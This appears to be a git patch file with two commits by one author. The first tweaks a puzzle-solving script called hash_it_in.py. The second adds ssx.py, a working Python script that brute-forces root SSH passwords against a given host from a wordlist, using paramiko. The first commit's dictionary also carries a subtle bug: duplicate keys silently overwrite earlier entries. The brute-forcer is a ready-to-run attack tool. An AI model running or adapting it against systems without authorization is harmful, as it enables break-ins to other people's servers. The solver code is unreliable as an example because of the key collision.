From dd7330f58a44c9484e44c591c333fe0ff1a2eb98 Mon Sep 17 00:00:00 2001 From: Orien Vandenbergh Date: Fri, 2 Sep 2016 19:37:12 -0600 Subject: [PATCH 1/2] Add support for stupid --- python/foobar/three/hash_it_in.py | 26 ++++---------------------- 1 file changed, 4 insertions(+), 22 deletions(-) diff --git a/python/foobar/three/hash_it_in.py b/python/foobar/three/hash_it_in.py index 690a06c..19233a2 100644 --- a/python/foobar/three/hash_it_in.py +++ b/python/foobar/three/hash_it_in.py @@ -21,27 +21,6 @@ def mod(a): def xor(a,b): return a ^ b -def first_round(c,i0,i1,o): - for name,opers in operations.iteritems(): - calculate(name,opers,c,i0,i1,o) - -#def calculate(name,opers,c,i0,i1,o): -# trials = itertools.permutations([c,i0,i1]) -# -# t = 0 -# for trial in trials: -# trial = list(trial) -# for i in range(0,len(opers)): -# if opers[i] == "mult": -# trial.insert(0,mult(trial.pop(0),trial.pop(0))) -# elif opers[i] == "xor": -# trial.insert(0,xor(trial.pop(0),trial.pop(0))) -# elif opers[i] == "mod": -# trial.insert(0,mod(trial.pop(0))) -# if trial[0] == o: -# print "Success using [%s] variant [%d] %d == %d" %(name,t,trial[0],o) -# t += 1 - def dereference(operand,c,i0,i1): if operand == "c": return c @@ -70,7 +49,10 @@ def first_tier(i0,i1,o): operations = { "*^%": ["mult","xor","mod"], "*%^": ["mult","mod","xor"], - "^*%": ["xor","mult","mod"] + "^*%": ["xor","mult","mod"], + "^%*": ["xor","mod","mult"], + "*%^": ["mod","mult","xor"], + "*^%": ["mod","xor","mult"] } for oidx,operand in enumerate(operands): From 0ea4d9780322f913fed18d8cfca8315457d63843 Mon Sep 17 00:00:00 2001 From: Orien Vandenbergh Date: Tue, 6 Sep 2016 09:26:05 -0600 Subject: [PATCH 2/2] Add framework for ssh bruteforcer --- python/ssx/ssx.py | 57 +++++++++++++++++++++++++++++++++++++++++++++++ 1 file changed, 57 insertions(+) create mode 100755 python/ssx/ssx.py diff --git a/python/ssx/ssx.py b/python/ssx/ssx.py new file mode 100755 index 0000000..a3651a8 --- /dev/null +++ b/python/ssx/ssx.py @@ -0,0 +1,57 @@ +#!/usr/bin/env python + +import paramiko +import argparse +import os, sys, socket + +def parse_args(): + parser = argparse.ArgumentParser(description="Attempt to discover what the root password might have been") + parser.add_argument('host', metavar="hostname", type=str, nargs=1, help="host to connect to") + parser.add_argument('--file', type=str, nargs=1, help="initial list of passwords to test") + + return parser.parse_args() + +def ssh_connect(host,password,username='root',code=0): + ssh = paramiko.SSHClient() + ssh.set_missing_host_key_policy(paramiko.AutoAddPolicy()) + + try: + ssh.connect(host,port=22,username=username,password=password) + except paramiko.AuthenticationException: + # Authentication Failure + code = 1 + except socket.error,e: + # Connection Failure + code = 2 + + ssh.close() + return code + +if __name__ == "__main__": + try: + args = parse_args() + if args.file and os.path.exists(args.file[0]) == False: + print "[E] File '%s' does not exist" %(args.file) + sys.exit(4) + except KeyboardInterrupt: + print "[I] Interrupted by user intervention" + sys.exit(3) + + input_file = open(args.file[0]) + + for attempt in input_file.readlines(): + password = attempt.strip("\n") + try: + result = ssh_connect(args.host[0],password) + if result == 0: + print "" + print " - Password found: [ %s ]" %(password) + sys.exit(0) + elif result == 1: + print ".", + elif result == 2: + print " [E] Connection Refused, giving up" + except Exception, e: + print e + pass + input_file.close()